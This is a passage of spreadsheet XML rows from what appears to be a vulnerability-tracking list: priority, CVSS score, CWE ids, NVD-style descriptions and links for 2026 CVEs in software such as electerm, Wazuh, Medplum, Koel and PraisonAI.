      <c r="G3116" s="5" t="inlineStr"/>
      <c r="H3116" s="5" t="inlineStr"/>
      <c r="I3116" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3116" s="5" t="inlineStr"/>
      <c r="K3116" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3116" s="5" t="inlineStr">
        <is>
          <t>electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to 3.11.11, electerm uses remote-supplied filenames directly with path.join() while receiving Zmodem and Trzsz transfers. In src/app/server/zmodem.js, prepareReceiveFile() joins the filename to the user-selected save path, and in src/app/server/trzsz.js, getUniqueFilePath(), the openSaveFile() callback, and the savedFilePaths mapping construct destinations without sanitization. A malicious SSH server or remote shell can provide a filename containing traversal components such as ../escaped.txt or ../../.bashrc. When the victim accepts the transfer and selects a download directory, electerm can write outside that directory and overwrite files accessible to the desktop user, potentially changing sensitive configuration or impairing availability. This issue is fixed in version 3.11.11.</t>
        </is>
      </c>
      <c r="M3116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49253</t>
        </is>
      </c>
    </row>
    <row r="3117">
      <c r="A3117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49315</t>
        </is>
      </c>
      <c r="C3117" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3117" s="5" t="inlineStr"/>
      <c r="F3117" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3117" s="5" t="inlineStr"/>
      <c r="H3117" s="5" t="inlineStr"/>
      <c r="I3117" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3117" s="5" t="inlineStr"/>
      <c r="K3117" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="L3117" s="5" t="inlineStr">
        <is>
          <t>DoS vulnerability in the input device module.
Impact: Successful exploitation of this vulnerability may affect availability.</t>
        </is>
      </c>
      <c r="M3117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49315</t>
        </is>
      </c>
    </row>
    <row r="3118">
      <c r="A3118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50165</t>
        </is>
      </c>
      <c r="C3118" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3118" s="5" t="inlineStr"/>
      <c r="F3118" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3118" s="5" t="inlineStr"/>
      <c r="H3118" s="5" t="inlineStr"/>
      <c r="I3118" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3118" s="5" t="inlineStr"/>
      <c r="K3118" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L3118" s="5" t="inlineStr">
        <is>
          <t>alf.io is an open source ticket reservation system for conferences, trade shows, workshops, and meetups. An Improper Access Control issue in versions prior to 2.0-M5-2605 allows an organization owner to read system-level configuration secrets through organization/event scoped "single configuration" endpoints. The affected endpoints require organization or event ownership, but they accept an arbitrary configuration key and then return the first matching value from a lookup that includes system-level configuration. As a result, an organization owner can retrieve secrets intended to be administrator-only, including the system API key when it is configured. Version 2.0-M5-2605 fixes the issue.</t>
        </is>
      </c>
      <c r="M3118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50165</t>
        </is>
      </c>
    </row>
    <row r="3119">
      <c r="A3119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52762</t>
        </is>
      </c>
      <c r="C3119" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3119" s="5" t="inlineStr"/>
      <c r="F3119" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3119" s="5" t="inlineStr"/>
      <c r="H3119" s="5" t="inlineStr"/>
      <c r="I3119" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3119" s="5" t="inlineStr"/>
      <c r="K3119" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L3119" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, YesWiki Bazar contains a stored Server-Side Template Injection (SSTI) vulnerability in the semantic template feature that can be escalated to confirmed Remote Code Execution (RCE). An authenticated administrator can place arbitrary Twig expressions into the Semantic template (Twig) field (bn_sem_template), and that content is later executed server-side when public semantic endpoints are requested. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M3119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52762</t>
        </is>
      </c>
    </row>
    <row r="3120">
      <c r="A3120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53532</t>
        </is>
      </c>
      <c r="C3120" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3120" s="5" t="inlineStr"/>
      <c r="F3120" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3120" s="5" t="inlineStr"/>
      <c r="H3120" s="5" t="inlineStr"/>
      <c r="I3120" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3120" s="5" t="inlineStr"/>
      <c r="K3120" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L3120" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. In versions 3.4.0 through 3.4.12, a crafted HTJ2K-compressed EXR file causes an unconditional process abort in any application that calls exr_start_read() on untrusted input, resulting in denial of service. The crash is triggered by a QCD marker whose lower five bits are zero, which OpenEXR passes into the vendored OpenJPH library while constructing the codestream and evaluating its quantization delta parameters. OpenJPH uses an assertion rather than a recoverable error to validate those bits, so any invalid value calls abort() directly and cannot be intercepted by surrounding error handling, a problem compounded by OpenEXR wrapping only its internal HT header parser in error handling while leaving the later codestream read and construction calls unprotected. This issue has been resolved in version 3.4.13.</t>
        </is>
      </c>
      <c r="M3120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53532</t>
        </is>
      </c>
    </row>
    <row r="3121">
      <c r="A3121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53603</t>
        </is>
      </c>
      <c r="C3121" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3121" s="5" t="inlineStr"/>
      <c r="F3121" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3121" s="5" t="inlineStr"/>
      <c r="H3121" s="5" t="inlineStr"/>
      <c r="I3121" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3121" s="5" t="inlineStr"/>
      <c r="K3121" s="5" t="inlineStr">
        <is>
          <t>CWE-312, CWE-522</t>
        </is>
      </c>
      <c r="L3121" s="5" t="inlineStr">
        <is>
          <t>nebula-mesh is a self-hosted control plane for Slack Nebula mesh VPN. Prior to version 0.3.8, Operator session tokens are stored in plaintext in the operator_sessions table (the token column is the PRIMARY KEY). The session token is a 32-byte random hex value sent directly in a cookie and valid for 24 hours. Anyone who can read the database (backup, snapshot, file copy, or SQL-level disclosure) obtains every active session token and can hijack operator sessions directly, with no further authentication. This issue has been patched in version 0.3.8.</t>
        </is>
      </c>
      <c r="M3121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53603</t>
        </is>
      </c>
    </row>
    <row r="3122">
      <c r="A3122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53604</t>
        </is>
      </c>
      <c r="C3122" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3122" s="5" t="inlineStr"/>
      <c r="F3122" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3122" s="5" t="inlineStr"/>
      <c r="H3122" s="5" t="inlineStr"/>
      <c r="I3122" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3122" s="5" t="inlineStr"/>
      <c r="K3122" s="5" t="inlineStr">
        <is>
          <t>CWE-212, CWE-316</t>
        </is>
      </c>
      <c r="L3122" s="5" t="inlineStr">
        <is>
          <t>nebula-mesh is a self-hosted control plane for Slack Nebula mesh VPN. Prior to version 0.3.8, the web handler renderMobileBundle passes the real *pki.CAResolver directly into mobilebundle.Build. Inside Build, resolver.LoadByID decrypts the CA's ed25519 private key into a *pki.CAManager, but Build never calls CAManager.Wipe() on any return path. As a result, when a mobile-bundle request goes through the web UI and Build returns — especially on error (missing network, invalid prefix, DB error, signing failure) — the plaintext CA private key remains on the Go heap, unwiped, until garbage collection. An attacker able to read process memory (core dump, swap, memory-scraping) can recover the CA signing key, which would allow minting arbitrary host certificates for the mesh. The API handler already does this correctly: it loads the CAManager, defer caMgr.Wipe(), and wraps it in caManagerResolver. Only the web path is affected. This issue has been patched in version 0.3.8.</t>
        </is>
      </c>
      <c r="M3122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53604</t>
        </is>
      </c>
    </row>
    <row r="3123">
      <c r="A3123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53704</t>
        </is>
      </c>
      <c r="C3123" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3123" s="5" t="inlineStr"/>
      <c r="F3123" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3123" s="5" t="inlineStr"/>
      <c r="H3123" s="5" t="inlineStr"/>
      <c r="I3123" s="5" t="inlineStr">
        <is>
          <t>2026-06-15</t>
        </is>
      </c>
      <c r="J3123" s="5" t="inlineStr"/>
      <c r="K3123" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3123" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GStreamer's RealMedia demuxer in the gst-plugins-ugly package. When processing a RealMedia file containing a specially crafted FILEINFO metadata section, the demuxer parses variable-name and variable-value pairs using re_skip_pascal_string() without validating that offsets remain within the mapped buffer. Additionally, the element count controlling the parsing loop is read from attacker-controlled data without validation, which can cause an infinite loop. A crafted RealMedia file can cause the application to crash, hang, or potentially read limited adjacent memory contents.</t>
        </is>
      </c>
      <c r="M3123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53704</t>
        </is>
      </c>
    </row>
    <row r="3124">
      <c r="A3124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53728</t>
        </is>
      </c>
      <c r="C3124" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3124" s="5" t="inlineStr"/>
      <c r="F3124" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3124" s="5" t="inlineStr"/>
      <c r="H3124" s="5" t="inlineStr"/>
      <c r="I3124" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3124" s="5" t="inlineStr"/>
      <c r="K3124" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-601</t>
        </is>
      </c>
      <c r="L3124" s="5" t="inlineStr">
        <is>
          <t>Medplum is a developer platform that enables development of healthcare apps. Prior to version 5.1.6, the external identity provider callback at GET /auth/external accepts attacker-controlled redirect URIs that only need to start with a registered client redirect URI, rather than matching exactly. After a successful external IdP login, the server appends Medplum login and code values to that attacker-supplied URL and issues a redirect. Because the external login request state is serialized as raw JSON and later trusted by the callback, an attacker who can tamper with state.redirectUri can cause Medplum to redirect authorization artifacts to an attacker-controlled endpoint. When the registered redirect URI is a bare origin or another prefix that can be extended into a different hostname, this becomes a cross-origin authorization code leak. This issue has been patched in version 5.1.6.</t>
        </is>
      </c>
      <c r="M3124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53728</t>
        </is>
      </c>
    </row>
    <row r="3125">
      <c r="A3125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53792</t>
        </is>
      </c>
      <c r="C3125" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3125" s="5" t="inlineStr"/>
      <c r="F3125" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3125" s="5" t="inlineStr"/>
      <c r="H3125" s="5" t="inlineStr"/>
      <c r="I3125" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3125" s="5" t="inlineStr"/>
      <c r="K3125" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-787</t>
        </is>
      </c>
      <c r="L3125" s="5" t="inlineStr">
        <is>
          <t>rsync before 3.5.0 contains an out-of-bounds read vulnerability in the sender-side block matching logic that allows a malicious receiver to trigger memory access before the start of an allocated buffer by sending a crafted checksum block with a length of zero. Attackers can send a specially crafted checksum set containing a zero-length block to cause a negative offset calculation during delta computation, resulting in an out-of-bounds read of file data buffer memory on the sender side.</t>
        </is>
      </c>
      <c r="M3125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53792</t>
        </is>
      </c>
    </row>
    <row r="3126">
      <c r="A3126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54085</t>
        </is>
      </c>
      <c r="C3126" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3126" s="5" t="inlineStr"/>
      <c r="F3126" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3126" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3126" s="5" t="inlineStr"/>
      <c r="I3126" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3126" s="5" t="inlineStr"/>
      <c r="K3126" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L3126" s="5" t="inlineStr">
        <is>
          <t>Wazuh is an open-source security platform providing unified XDR and SIEM protection for endpoints and cloud workloads. In versions 4.2.0 through 4.14.6, multiple active response scripts pass attacker-influenced alert fields to privileged system commands without validating their format, allowing argument injection into tools that run as root. Five of the eight scripts that handle the srcip field, route-null.c, netsh.c, pf.c, npf.c, and ipfw.c, omit the get_ip_version() check that rejects non-IP input, and disable-account.c passes the dstuser field to passwd/chuser with only a comparison against "root". An attacker who can inject crafted log events, for example via syslog, can supply srcip or dstuser values that, when an active response rule triggers, are passed unvalidated to firewall and account-management commands such as pfctl, npfctl, ipfw, route, netsh, and passwd. This enables injecting additional command arguments, and on Windows the unquoted CreateProcess command-line concatenation in wpopenv() lets a srcip containing spaces add further arguments, while disable-account.c can be abused to lock arbitrary system accounts. This issue is fixed in version 4.14.7.</t>
        </is>
      </c>
      <c r="M3126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54085</t>
        </is>
      </c>
    </row>
    <row r="3127">
      <c r="A3127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54356</t>
        </is>
      </c>
      <c r="C3127" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3127" s="5" t="inlineStr"/>
      <c r="F3127" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3127" s="5" t="inlineStr"/>
      <c r="H3127" s="5" t="inlineStr"/>
      <c r="I3127" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3127" s="5" t="inlineStr"/>
      <c r="K3127" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3127" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.41.3, POST /api/attachments/:datasourceId/url in packages/server/src/api/routes/static.ts and packages/server/src/api/controllers/static/index.ts allows an authenticated published-app user with the BASIC role to supply attacker-controlled bucket and key values and obtain signedUrl and publicUrl values backed by stored S3 datasource credentials. This issue is fixed in version 3.41.3.</t>
        </is>
      </c>
      <c r="M3127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54356</t>
        </is>
      </c>
    </row>
    <row r="3128">
      <c r="A3128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54491</t>
        </is>
      </c>
      <c r="C3128" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3128" s="5" t="inlineStr"/>
      <c r="F3128" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3128" s="5" t="inlineStr"/>
      <c r="H3128" s="5" t="inlineStr"/>
      <c r="I3128" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3128" s="5" t="inlineStr"/>
      <c r="K3128" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3128" s="5" t="inlineStr">
        <is>
          <t>Koel is a free, open-source music streaming solution. Prior to 9.7.1, outbound podcast and radio fetch paths perform a point-in-time App\Helpers\Network::isPublicHost() or isSafeUrl() check without pinning the validated address, and most paths lack redirect-hop validation and do not revalidate every redirect target. PhanAn\Poddle\Poddle::fromUrl(), PodcastService::getStreamableUrl(), PodcastService::isPodcastObsolete(), App\Rules\HasAudioContentType, and App\Rules\SafeUrl can therefore follow an attacker-controlled redirect to an internal address or connect after DNS rebinding changes a public resolution to a private one. These paths are reachable through podcast and radio APIs, including createPodcastChannel, createInternetRadioStation, refreshPodcasts, apiResource podcasts, and radio/stations, allowing an authenticated user to request internal services or cloud metadata and potentially receive parsed or streamed response content. This issue is fixed in version 9.7.1.</t>
        </is>
      </c>
      <c r="M3128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54491</t>
        </is>
      </c>
    </row>
    <row r="3129">
      <c r="A3129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54715</t>
        </is>
      </c>
      <c r="C3129" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3129" s="5" t="inlineStr"/>
      <c r="F3129" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3129" s="5" t="inlineStr"/>
      <c r="H3129" s="5" t="inlineStr"/>
      <c r="I3129" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J3129" s="5" t="inlineStr"/>
      <c r="K3129" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L3129" s="5" t="inlineStr">
        <is>
          <t>GoAccess is a real-time web log analyzer and interactive viewer that runs in a terminal in *nix systems or through the browser. In version 1.10.2, parse_browser assumes the matched browser token begins with Opera and moves a trailing version substring to match plus five, allowing a crafted User-Agent in a processed access log to write one to four attacker-influenced bytes beyond the heap allocation and corrupt or crash GoAccess. This issue is fixed in version 1.11.</t>
        </is>
      </c>
      <c r="M3129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54715</t>
        </is>
      </c>
    </row>
    <row r="3130">
      <c r="A3130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55066</t>
        </is>
      </c>
      <c r="C3130" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3130" s="5" t="inlineStr"/>
      <c r="F3130" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3130" s="5" t="inlineStr"/>
      <c r="H3130" s="5" t="inlineStr"/>
      <c r="I3130" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3130" s="5" t="inlineStr"/>
      <c r="K3130" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3130" s="5" t="inlineStr">
        <is>
          <t>Vikunja is an open-source self-hosted task management platform. Prior to 2.4.0, POST /api/v1/projects/{project}/views/{view}/buckets/{bucket}/tasks accepts a body supplied task_id but TaskBucket.CanUpdate in pkg/models/kanban_task_bucket.go authorizes only the project, view, and bucket from the URL. updateTaskBucket then calls Task.ReadOne without a separate task permission check, returns the victim task contents, and can update the task done state when the attacker chooses a done bucket. Because task identifiers are global sequential values, an authenticated user can enumerate cross-tenant tasks and modify their completion metadata through both the v1 and v2 routes that share this model. This issue is fixed in version 2.4.0.</t>
        </is>
      </c>
      <c r="M3130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55066</t>
        </is>
      </c>
    </row>
    <row r="3131">
      <c r="A3131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55502</t>
        </is>
      </c>
      <c r="C3131" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3131" s="5" t="inlineStr"/>
      <c r="F3131" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3131" s="5" t="inlineStr"/>
      <c r="H3131" s="5" t="inlineStr"/>
      <c r="I3131" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J3131" s="5" t="inlineStr"/>
      <c r="K3131" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3131" s="5" t="inlineStr">
        <is>
          <t>Cloudreve is a self-hosted file management and sharing system. Prior to 4.17.0, POST /api/v4/admin/policy/oauth/signin requires only Admin.Read even though GetOauthRedirectService persists caller-supplied OneDrive secret and app_id values, allowing an OAuth token without Admin.Write to modify storage policy credentials. The route is inside the admin group that requires Admin.Read, but it does not add the local Admin.Write guard used by sibling policy mutation routes. Its handler persists attacker-supplied secret and app_id values into the selected OneDrive storage policy before returning an OAuth URL. This issue is fixed in version 4.17.0.</t>
        </is>
      </c>
      <c r="M3131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55502</t>
        </is>
      </c>
    </row>
    <row r="3132">
      <c r="A3132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55520</t>
        </is>
      </c>
      <c r="C3132" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3132" s="5" t="inlineStr"/>
      <c r="F3132" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3132" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H3132" s="5" t="inlineStr"/>
      <c r="I3132" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3132" s="5" t="inlineStr"/>
      <c r="K3132" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="L3132" s="5" t="inlineStr">
        <is>
          <t>Protego is a pure-Python robots.txt parser with support for modern conventions. Prior to 0.6.2, protego._urlpattern._URLPattern._prepare_pattern_for_regex translates every asterisk in an Allow or Disallow directive into a lazy regular-expression wildcard, so a directive containing many asterisks creates exponential backtracking. After protego.Protego.parse processes a crafted robots.txt file, protego.Protego.can_fetch can spend an attacker-controlled period matching a near-miss URL and deny service to the crawler. The vulnerable path is src/protego/_urlpattern.py in the _URLPattern match logic. This issue is fixed in version 0.6.2.</t>
        </is>
      </c>
      <c r="M3132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55520</t>
        </is>
      </c>
    </row>
    <row r="3133">
      <c r="A3133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55527</t>
        </is>
      </c>
      <c r="C3133" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3133" s="5" t="inlineStr"/>
      <c r="F3133" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3133" s="5" t="inlineStr"/>
      <c r="H3133" s="5" t="inlineStr"/>
      <c r="I3133" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3133" s="5" t="inlineStr"/>
      <c r="K3133" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="L3133" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonaiagents 1.6.58, the FileMemory constructor joins unsanitized user_id into self.user_path. A caller supplying ../ or path separators can escape the memory directory and write JSON data to arbitrary process-writable locations. The fix sanitizes user_id before constructing self.user_path. This issue is fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="M3133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55527</t>
        </is>
      </c>
    </row>
    <row r="3134">
      <c r="A3134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55537</t>
        </is>
      </c>
      <c r="C3134" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3134" s="5" t="inlineStr"/>
      <c r="F3134" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3134" s="5" t="inlineStr"/>
      <c r="H3134" s="5" t="inlineStr"/>
      <c r="I3134" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3134" s="5" t="inlineStr"/>
      <c r="K3134" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-705, CWE-918</t>
        </is>
      </c>
      <c r="L3134" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, JobSubmitRequest.validate_webhook_url() accepts webhook_url when resolution raises socket.gaierror because the exception path uses except socket.gaierror: pass. JobExecutor._send_webhook() later performs a fresh lookup, allowing DNS changes to direct the request to an internal service. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M3134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55537</t>
        </is>
      </c>
    </row>
    <row r="3135">
      <c r="A3135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55540</t>
        </is>
      </c>
      <c r="C3135" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3135" s="5" t="inlineStr"/>
      <c r="F3135" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3135" s="5" t="inlineStr"/>
      <c r="H3135" s="5" t="inlineStr"/>
      <c r="I3135" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
